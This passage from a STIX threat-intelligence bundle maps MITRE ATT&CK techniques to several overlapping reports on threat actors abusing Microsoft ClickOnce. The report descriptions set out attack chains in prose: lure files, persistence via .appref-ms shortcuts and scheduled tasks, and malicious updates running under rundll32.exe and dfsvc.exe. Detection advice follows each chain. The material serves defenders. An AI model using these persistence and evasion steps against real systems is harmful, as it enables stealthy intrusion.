      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d6a22275-b526-5e17-afc0-6547c76d54c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--48af19dc-9768-5c37-9fdc-1b7b55594d31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology, Part 2: Stop Threat Actors from Clicking Once and Staying Forever",
      "description": "## Overview\n\nCrowdStrike has observed new abuse of Microsoft's ClickOnce technology by threat actors for malware delivery, persistence, and defense evasion, as detailed in their July 2026 report, \"New Abuse of the ClickOnce Technology, Part 2.\" This method bypasses common protection mechanisms by leveraging ClickOnce's low-friction installation, often requiring only one or two clicks from the target. Adversaries capitalize on the general lack of awareness regarding `.application` files and ClickOnce behavior, allowing them to install malicious payloads without requiring elevated privileges. A key abuse involves compromising legitimate ClickOnce application servers to push malicious updates via `.appref-ms` files, ensuring that even initially benign applications can become malicious, executing within trusted `rundll32.exe` and `dfsvc.exe` processes. This technique provides attackers with a stealthy and persistent method for maintaining remote access and updating their malware.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious ClickOnce application or compromises a legitimate ClickOnce deployment server.\n2.  Attacker entices a user to click a misleading link or button on a webpage, leading to the execution of a `.application` file.\n3.  The ClickOnce application initiates its deployment and installation on the user's Windows system.\n4.  A `.appref-ms` shortcut file is dropped into the user's Start Menu (e.g., `%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\`) for offline access or persistence.\n5.  The attacker pushes a malicious update to the controlled or compromised ClickOnce deployment server.\n6.  The user launches the ClickOnce application, either from the Start Menu shortcut, by placing the `.appref-ms` file in the Startup folder, or via a scheduled task.\n7.  The ClickOnce components detect an available update, fetch the malicious payload from the deployment server, and execute it.\n8.  The malicious payload executes under legitimate Microsoft processes like `rundll32.exe` or `dfsvc.exe`, establishing persistence, command and control, or further compromise.\n\n## Impact\n\nThe abuse of ClickOnce technology significantly lowers the barrier to entry for attackers, as it enables the deployment of malware without requiring elevated privileges and often bypasses traditional security controls like mailbox filtering systems. If successful, attackers can achieve persistent access to target systems, execute arbitrary code within legitimate Microsoft processes, and maintain remote access with an easily updatable malicious payload. This stealthy execution can lead to data exfiltration, further network compromise, or the deployment of ransomware, impacting targeted organizations across various sectors. The lack of user awareness about ClickOnce installation mechanisms makes this an effective social engineering vector.\n\n## Recommendation\n\n*   Deploy the provided Sigma rules to your SIEM to detect suspicious persistence mechanisms leveraging `.appref-ms` files.\n*   Enable Sysmon `ProcessCreate` and `FileCreate` event logging to activate the Sigma rules and gain visibility into process execution and file system changes related to ClickOnce.\n*   Educate users on the risks associated with clicking links or opening `.application` files from untrusted sources, emphasizing that software installations should typically require explicit administrative consent.\n*   Monitor for unsanctioned ClickOnce applications being installed or updated within your environment, focusing on their origins and behaviors.\n",
      "published": "2026-07-07T19:31:46Z",
      "labels": [
        "clickonce",
        "malware-delivery",
        "persistence",
        "windows-exploitation",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e793caa-fb32-52bc-a85a-b1f3717bca6e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ec7559b-0bd4-59b7-a3e8-4a6418cdcc8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ef849e05-7e68-5359-823e-86fb2b5222cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c39c01e8-06fc-57de-8f90-7e80c03014f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78fcb0f5-92e6-5b49-abe8-b42cc7619675",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea1d7b84-c79c-58ea-88a9-1551a7fd772b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--67801008-91f0-5951-8d8f-af5451384390",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--95e84284-ced3-57a5-888c-4f1673b72629",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--08913d81-a86c-55ac-adf0-4fe446a8fd77",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Abuse ClickOnce for Stealthy Malware Delivery and Persistence",
      "description": "## Overview\n\nCrowdStrike has identified a new wave of abuse targeting Microsoft's ClickOnce technology, which threat actors are weaponizing for malware delivery and persistence since at least June 2026. This method is effective because it requires minimal user interaction for deployment, often bypassing traditional security controls like mailbox filters by using `.application` files. Attackers exploit the general lack of awareness among users and security tools regarding ClickOnce applications, which don't require elevated privileges for installation, making standard user accounts vulnerable. A key tactic involves dropping `.appref-ms` files for offline availability, allowing attackers to push malicious updates or establish persistence via the Windows Startup folder or scheduled tasks. The malicious payloads execute within legitimate Microsoft processes such as `rundll32.exe` and `dfsvc.exe`, further increasing stealth and defense evasion. This abuse significantly enhances the delivery and post-exploitation phases of the attack chain, making it crucial for defenders to implement specific monitoring and detection strategies.\n\n## Attack Chain\n\n1.  **Initial Access**: Threat actors send spearphishing emails or host malicious web content to convince targets to click a button or open an `.application` file.\n2.  **Execution**: Upon user interaction, the ClickOnce application is installed without requiring elevated administrative privileges, directly executing the initial malicious payload.\n3.  **Defense Evasion**: The malicious payload executes within legitimate Microsoft process trees, specifically observed using `rundll32.exe` and `dfsvc.exe`, to masquerade as benign activity.\n4.  **Persistence - Shortcut Creation**: A legitimate `.appref-ms` file, which acts as a shortcut to the ClickOnce application, is dropped into the user's Start Menu programs folder (e.g., `%Users\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`).\n5.  **Persistence - Autostart**: Attackers leverage this `.appref-ms` file by placing it into the Windows Startup folder to ensure automatic execution upon system boot or user login.\n6.  **Persistence - Scheduled Task**: Alternatively, attackers create a scheduled task configured to regularly execute the `.appref-ms` file, maintaining persistent access.\n7.  **Ingress Tool Transfer / Command and Control**: The built-in ClickOnce update mechanism is exploited; when the user launches the application (or it auto-starts), the application checks for updates from the attacker-controlled server, allowing malicious updates or new components to be downloaded and executed without further user prompts.\n8.  **Impact**: Through the update mechanism, the attacker can update command and control (C2) addresses, deploy additional malware, move laterally, and exfiltrate data.\n\n## Impact\n\nSuccessful exploitation of this ClickOnce abuse vector leads to unauthorized code execution, malware deployment, and persistent access to victim systems without requiring administrator privileges. Organizations across all sectors are vulnerable, as the attack leverages a legitimate Windows feature and common user behaviors (clicking links, opening files). The stealthy execution within trusted Microsoft processes makes detection challenging, potentially leading to prolonged dwell times and severe consequences including data exfiltration, ransomware deployment, and lateral movement across the network. The ability to push updates via the ClickOnce mechanism ensures attackers can modify their payloads, evade evolving defenses, and maintain control over compromised endpoints.\n\n## Recommendation\n\n*   Enable verbose logging for process creation events, specifically for `dfsvc.exe` and `rundll32.exe`, to monitor for unusual child processes or loaded modules.\n*   Deploy the Sigma rules in this brief to your SIEM and tune them for your environment to detect ClickOnce persistence mechanisms.\n*   Review Group Policy Objects (GPOs) and endpoint security configurations to restrict execution of `.appref-ms` files from non-standard or user-writable locations.\n*   Monitor for the creation and modification of scheduled tasks that involve `.appref-ms` files to detect `attack.t1053.005`.\n*   Educate users on the risks associated with clicking suspicious links and opening unsolicited `.application` files, even if they appear to originate from trusted sources.\n",
      "published": "2026-07-07T07:18:52Z",
      "labels": [
        "clickonce",
        "persistence",
        "initial-access",
        "malware",
        "windows",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8173b0e4-f6b2-5a27-8496-0868530ac5b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db135e0b-983f-53c2-a969-f90a38758f15",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8b6766c4-b153-53bb-86b6-fc6c65deef9a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db135e0b-983f-53c2-a969-f90a38758f15",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7cc0c771-a5e5-5406-886b-89b5ced343d7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db135e0b-983f-53c2-a969-f90a38758f15",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6e8e027a-4588-5e11-bc92-f795ebd27fc3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db135e0b-983f-53c2-a969-f90a38758f15",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35861acb-7b47-5112-a7f5-6a4865275cc6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db135e0b-983f-53c2-a969-f90a38758f15",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6873b1d7-2737-5f92-a5b3-2ad17820b7cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db135e0b-983f-53c2-a969-f90a38758f15",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--db135e0b-983f-53c2-a969-f90a38758f15",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Abuse Microsoft ClickOnce for Stealthy Malware Delivery and Persistence",
      "description": "## Overview\n\nThreat actors are actively leveraging and abusing Microsoft's ClickOnce technology for malware delivery, execution, and persistence. This ongoing campaign capitalizes on ClickOnce's user-friendly deployment process, which requires minimal user interaction and bypasses traditional security scrutiny often applied to executable files. Attackers can deliver malware through deceptive web buttons or `.application` files, executing payloads without administrative privileges within legitimate Microsoft processes like `rundll32.exe` and `dfsvc.exe`, thereby increasing stealth and evading detection. The built-in update mechanism of ClickOnce applications is exploited to maintain persistent remote access and update malware, enabling changes to command and control (C2) infrastructure or facilitating lateral movement. Furthermore, adversaries can establish persistence by dropping `.appref-ms` shortcut files into the Windows Start Menu Startup folder or by creating scheduled tasks to launch these files. This attack vector is particularly effective due to a general lack of awareness regarding ClickOnce security implications among users and some security tools, allowing malicious applications to \"fly under the radar.\"\n\n## Attack Chain\n\n1.  **Initial Access via Deceptive Delivery**: Threat actors convince a user to click a malicious link on a webpage or open a `.application` file delivered via email or other social engineering means, leveraging the user-friendly aspect of ClickOnce deployment.\n2.  **ClickOnce Application Deployment**: Upon user interaction, the ClickOnce application deployment process initiates, installing the malicious application silently or with minimal prompts, and notably, without requiring administrator privileges.\n3.  **Stealthy Execution**: The malicious payload is executed by legitimate Microsoft processes, specifically `rundll32.exe` or `dfsvc.exe`, masking its true nature and allowing it to run within an expected process tree, thus evading traditional security tool scrutiny.\n4.  **Persistence via Shortcut File**: To maintain access, an `.appref-ms` file, which references the installed ClickOnce application, is strategically placed in the user's Startup folder (`%AppData%\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`).\n5.  **Persistence via Scheduled Task**: Alternatively or additionally, a scheduled task is created to regularly execute the `.appref-ms` file, ensuring the malicious application runs at specific intervals or system events.\n6.  **Malware Update and C2**: The attacker leverages the ClickOnce application's built-in update mechanism to push malicious updates from a controlled deployment server. These updates automatically download and run when the user starts the application, often without additional user prompts.\n7.  **Sustained Remote Access and Objectives**: The updated malware maintains persistent remote access, enabling ongoing command and control (C2), data exfiltration, lateral movement, or other objectives, operating under the guise of a legitimate application.\n\n## Impact\n\nSuccessful exploitation of ClickOnce technology leads to the stealthy installation and execution of malware on target systems, often bypassing traditional security defenses due to its legitimate process execution and low scrutiny of `.application` files. Attackers gain persistent remote access, can update their malicious payloads as needed for evolving command and control or lateral movement, and can operate without requiring administrative privileges, affecting standard user accounts across an enterprise. The lack of user prompts for updates upon subsequent application launches further exacerbates the risk, allowing benign-appearing applications to transform into malicious ones without user consent, potentially leading to data breaches, system compromise, and significant business disruption.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious ClickOnce activity.\n*   Enable Sysmon process-creation and file-creation logging to capture telemetry relevant to ClickOnce execution and persistence, which is necessary for the provided rules.\n*   Review and enforce application whitelisting policies to prevent the execution of untrusted `.application` files and their subsequent processes.\n*   Educate users on the risks associated with unsolicited ClickOnce application deployments and the potential for malicious web buttons or `.application` files.\n",
      "published": "2026-07-07T15:23:11Z",
      "labels": [
        "persistence",
        "execution",
        "defense-evasion",
        "malware",
        "microsoft",
        "clickonce"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--abe34155-a81b-5484-a932-bc4575a0fe82",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d290d3a5-4db6-52a1-9a3d-e0eeebd3f19e",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d912f3a8-d1b2-5134-a482-a6cd270d220e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d290d3a5-4db6-52a1-9a3d-e0eeebd3f19e",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c76bc9c8-476c-52a3-a202-1b2a57e177e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d290d3a5-4db6-52a1-9a3d-e0eeebd3f19e",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--df562775-506e-5e38-9b27-646998c8e268",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d290d3a5-4db6-52a1-9a3d-e0eeebd3f19e",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f4a384b7-4fde-58be-8fb9-aea4789053de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d290d3a5-4db6-52a1-9a3d-e0eeebd3f19e",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d290d3a5-4db6-52a1-9a3d-e0eeebd3f19e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology: Stop Threat Actors from Clicking Once and Staying Forever",
